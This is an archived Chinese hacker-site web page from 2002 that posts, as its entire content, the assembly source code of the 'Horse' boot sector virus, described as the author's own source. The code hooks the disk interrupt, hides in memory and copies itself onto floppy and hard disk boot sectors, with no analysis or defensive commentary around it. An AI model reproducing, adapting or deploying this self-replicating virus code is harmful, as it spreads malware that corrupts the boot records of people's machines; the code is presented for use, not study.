📄 boothors病毒源程序.htm
字号:
<html><head><title>BOOTHORS病毒源程序 </title><meta http-equiv=Content-Type content="text/html; charset=gb2312"><link rel=stylesheet href=../style.css type=text/css></head><body oncontextmenu=window.event.returnValue=false onselectstart=event.returnValue=false ondragstart=window.event.returnValue=false onsource="event.returnValue=false" bgcolor=#FFFFFF text=#000000 onmousemove=event.returnValue=false;><table border=0 cellspacing=1 width=100% cellpadding=6 height=98> <tr> <td width=100% bgcolor=#333333 height=8> <div align=left><font color=#ffffcc size=2><b><b><font color=#ffffcc size=2><b><b><font color=#FFFFFF><a href=../index.html><font color=#00FF00>※黑客攻防指南※</font></a></font></b></b></font></b></b></font><font color=#FF0000><b>===></b><font size=2><a href=../vir.htm><font color=#00FF00><b>病毒信息</b></font></a></font></font><font color=#FFFFFF><font color=#FF0000><b>==></b></font><a href=vir00034.htm><font color=#808080 size=2><font color=#000000><b><font color=#FFFFFF><b><font color=#00FF00>BOOTHORS病毒源程序 </font></b></font></b></font></font></a></font></div> </td> </tr> <tr> <td width=100% bgcolor=#F4F4FF height=10 valign=top> <div align=center> <script src="http://www.heibai.net/cgibin/ads/leoad.cgi"></script> </div> </td> </tr> <tr> <td width=100% bgcolor=#F4F4FF height=136 valign=top> <div align=center>
<font size="3"></font><b><font size="3">BOOTHORS病毒源程序 </font></b></div>
<p align="left">
;<br>
; The Horse's boot sector virus<br>
; This is an author's source<br>
;<br>
<br>
<br>
<br>
.radix 16<br>
begin:<br>
jmp start<br>
<br>
my label word<br>
<br>
db 'IBM 3.3'<br>
dw 200<br>
db 2<br>
dw 1<br>
db 2<br>
dw 70<br>
dw 2d0<br>
db 0fdh<br>
dw 2<br>
dw 9<br>
dw 2<br>
dw 0<br>
<br>
lee label word<br>
<br>
virlen equ offset endcode-begin<br>
<br>
start:<br>
cld<br>
sub ax,ax<br>
mov ds,ax<br>
mov bp,7c00<br>
cli<br>
mov ss,ax<br>
mov sp,bp<br>
sti<br>
push ax<br>
push bp<br>
mov ax,[413]<br>
push [13*4+2]<br>
push [13*4]<br>
pop word ptr [old13h+7c00-100]<br>
pop word ptr [old13h+7c00-100+2]<br>
dec ax<br>
mov [413],ax<br>
mov cl,6<br>
shl ax,cl<br>
mov es,ax<br>
<br>
mov [13*4],offset int13h-100<br>
mov [13*4+2],es<br>
<br>
mov cx,virlen<br>
sub di,di<br>
mov si,bp<br>
rep movsb<br>
push es<br>
mov ax,offset here-begin<br>
push ax<br>
retf<br>
here:<br>
sub ax,ax<br>
mov es,ax<br>
int 13<br>
mov ax,0201<br>
mov bx,bp<br>
cmp byte ptr cs:[ident-100],0fdh<br>
je from_disk<br>
mov cx,0007<br>
mov dx,0080<br>
int 13<br>
jmp exit<br>
<br>
from_disk:<br>
<br>
mov cx,2709<br>
mov dx,0100<br>
int 13<br>
jc exit<br>
push cs<br>
push cs<br>
pop es<br>
pop ds<br>
mov ax,0201<br>
mov bx,0200<br>
mov cx,0001<br>
mov dx,0080<br>
int 13<br>
jc exit<br>
call inf?<br>
je exit<br>
mov byte ptr [ident-100],0f8<br>
mov ax,0301<br>
mov bx,0200<br>
mov cx,0007<br>
mov dx,0080<br>
int 13<br>
jc exit<br>
call move<br>
mov ax,0301<br>
sub bx,bx<br>
mov cx,0001<br>
int 13<br>
exit:<br>
mov byte ptr cs:[ident-100],0fdh<br>
retf<br>
int13h:<br>
push ds<br>
push ax<br>
cmp dl,1<br>
ja skip<br>
cmp ah,2<br>
jb skip<br>
cmp ah,3<br>
ja skip<br>
sub ax,ax<br>
mov ds,ax<br>
mov al,[43f]<br>
push dx<br>
and ax,3<br>
and dx,3<br>
inc dl<br>
test al,dl<br>
pop dx<br>
jne skip<br>
call infect<br>
skip:<br>
pop ax<br>
pop ds<br>
do:<br>
jmp dword ptr cs:[old13h-100]<br>
<br>
infected?:<br>
<br>
sub ax,ax<br>
call ojoj<br>
mov ax,0201<br>
mov bx,0200<br>
mov cx,0001<br>
sub dh,dh<br>
call ojoj<br>
inf?:<br>
mov si,offset start-100<br>
mov di,offset start-100+200<br>
mov cx,mbyte-start<br>
rep cmpsb<br>
return:<br>
ret<br>
infect:<br>
push bx<br>
push cx<br>
push dx<br>
push si<br>
push di<br>
push es<br>
push cs<br>
push cs<br>
pop es<br>
pop ds<br>
cld<br>
call infected?<br>
je leave<br>
mov ax,0301<br>
mov bx,0200<br>
mov cx,2709<br>
mov dh,1<br>
call ojoj<br>
jc leave<br>
call move<br>
mov ax,0301<br>
sub bx,bx<br>
mov cx,0001<br>
sub dh,dh<br>
call ojoj<br>
leave:<br>
pop es<br>
pop di<br>
pop si<br>
pop dx<br>
pop cx<br>
pop bx<br>
ret<br>
<br>
ojoj:<br>
pushf<br>
push cs<br>
call do<br>
ret<br>
move:<br>
mov di,offset my-100<br>
mov si,offset my-100+200<br>
mov cx,lee-my<br>
rep movsb<br>
mov di,offset usm-100<br>
mov si,offset usm-100+200<br>
mov cx,endcode-usm<br>
rep movsb<br>
ret<br>
<br>
<br>
mbyte label word<br>
<br>
old13h dd ?<br>
ident db 0fdh<br>
<br>
usm label word<br>
<br>
db 135d dup (?)<br>
<br>
db 55,0AA<br>
<br>
endcode label word <br>
<br>
<br>
</td> </tr> <tr> <td width=100% bgcolor=#F4F4FF height=17> <div align=center><a href=../index.html><font size=4> 主目录</font></a> <font size=4><a href=../vir.htm><font size=+1>分目录</font></a> </font></div> </td> </tr></table><table width=760 border=0 cellspacing=1 cellpadding=5 valign=bottom bgcolor=#CCCCCC height=30 align=center><tr bgcolor=#009966 valign=bottom bordercolor=#CCCCFF><td height=2 width=754 align=center bgcolor=#000000> <div align=center><font color=#000000><b><font color=#FFFFFF>Copyright By「</font><font color=#000000><b><font color=#000000><font color=#000000><font color=#000000><font color=#000000><font color=#000000><font color=#000000><b><font color=#000000><b><font color=#000000><b><font color=#FFFFFF><a href=http://www.heibai.net/ target=_blank><font color=#00FF00>黑白网络工作室</font></a></font></b></font></b></font></b></font></font></font></font></font></font></b></font><font color=#FFFFFF>」2002 All Rights Reserve</font></b></font><font color=#FFFFFF> </font></div> </td> </tr></table></body></html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -